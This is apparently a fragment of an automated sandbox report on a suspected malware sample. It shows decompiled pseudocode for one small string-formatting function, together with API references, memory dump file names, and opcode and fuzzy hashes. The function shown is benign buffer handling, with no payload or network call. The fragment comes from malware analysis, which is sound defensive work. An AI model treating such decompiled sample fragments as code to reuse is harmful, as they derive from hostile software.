                                                                                                                                                                        • Opcode Fuzzy Hash: 3d3ee9e39cbad5d7baf97f18bd1515f05ce169efab988a665b2b1dba638ea594
                                                                                                                                                                        • Instruction Fuzzy Hash: D201F4B1A00114ABDB10DF6ADC04E6EBBBDEFC6314F00452DF616E3290DB74A811C7A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                        			E00409206(void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                        				void* _t4;
                                                                                                                                                                        				void* _t11;
                                                                                                                                                                        				intOrPtr* _t18;
                                                                                                                                                                        
                                                                                                                                                                        				_t11 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				_t4 =  *((intOrPtr*)( *0x40e048))(1);
                                                                                                                                                                        				wsprintfW(_t11,  *0x40e2c0,  *((intOrPtr*)( *0x40e048))(0), _t4);
                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                        				 *_t18 = E0040A503( *_t18, _t11);
                                                                                                                                                                        				LocalFree(_t11);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}






                                                                                                                                                                        0x00409220
                                                                                                                                                                        0x0040922a
                                                                                                                                                                        0x00409241
                                                                                                                                                                        0x00409243
                                                                                                                                                                        0x00409253
                                                                                                                                                                        0x00409255
                                                                                                                                                                        0x00409262

                                                                                                                                                                        APIs
                                                                                                                                                                        • wsprintfW.USER32 ref: 00409241
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00409255
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Freelstrlen$GlobalLocalwsprintf
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 1776337052-1731603023
                                                                                                                                                                        • Opcode ID: a6f02408b57bb6edfa2692ba9a76c35bd721593c26e6cd395b4a707bb71862a4
                                                                                                                                                                        • Instruction ID: 61e08027baa078e2c9e7ece4edbf44c952e7995c37b9d281c560d8a8dceb99a7
                                                                                                                                                                        • Opcode Fuzzy Hash: a6f02408b57bb6edfa2692ba9a76c35bd721593c26e6cd395b4a707bb71862a4
                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF054B2204210AFF3049BABED45F66779CEB48720F044839F709E7291D5B56C2086A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%